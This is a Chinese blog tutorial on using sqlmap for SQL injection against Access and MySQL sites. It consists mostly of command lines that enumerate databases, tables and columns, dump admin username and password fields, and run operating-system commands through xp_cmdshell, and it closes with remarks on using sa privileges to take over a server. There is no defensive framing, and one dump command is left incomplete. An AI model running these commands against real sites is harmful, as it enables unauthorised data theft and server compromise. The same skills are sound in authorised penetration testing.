sqlmap使用教程及基本命令

本文详细介绍如何使用SQLMap工具针对Access及MySQL数据库进行SQL注入攻击,包括数据库、表、字段的探测,以及敏感数据的获取方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、SQLMAP用于Access数据库注入

(1) 猜解是否能注入

sqlmap.py -u "http://www.xxx.com/show.asp?id=1216"

(2) 猜解表

python sqlmap.py -u "http://www.xxx.com/show.asp?id=1216" --tables

(3) 根据猜解的表进行猜解表的字段

python sqlmap.py -u "http://www.xxx.com/show.asp?id=1216" --columns -T admin

(4) 根据字段猜解内容

python sqlmap.py -u "http://www.xxx.com/show.asp?id=1216" --dump -T admin -C "username,password"

SQLMAP用于mysql注入

(1) 查找数据库

python sqlmap.py -u "http://www.xxx.com/show.asp?id=1216" --dbs

(2) 通过第一步的数据库查找表

python sqlmap.py -u "http://www.xxx.com/show.asp?id=1216" -D dataname --tables

(3) 通过2中的表得出列名

python sqlmap.py -u "http://www.xxx.com/show.asp?id=1216" -D dataname -T table_name --columns

(4) 获取字段的值

python sqlmap.py -u "http://www.xxx.com/show.asp?id=1216" -D dataname -T table_name -C


其他命令

1.调用xp_cmdshell存储过程来执行操作系统命令(必须为sa权限)

sqlmap.py -u "注入点" --os-cmd="系统命令"

2.获取当前数据库的操作权限

sqlmap.py -u "注入点" --current-user --batch

不同的数据库权限对应的不同的攻击手段

bd权限的注入点:可以对网站的目录进行枚举
sa权限的注入点:可以利用存储过程来获取服务器权限或者网站的权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值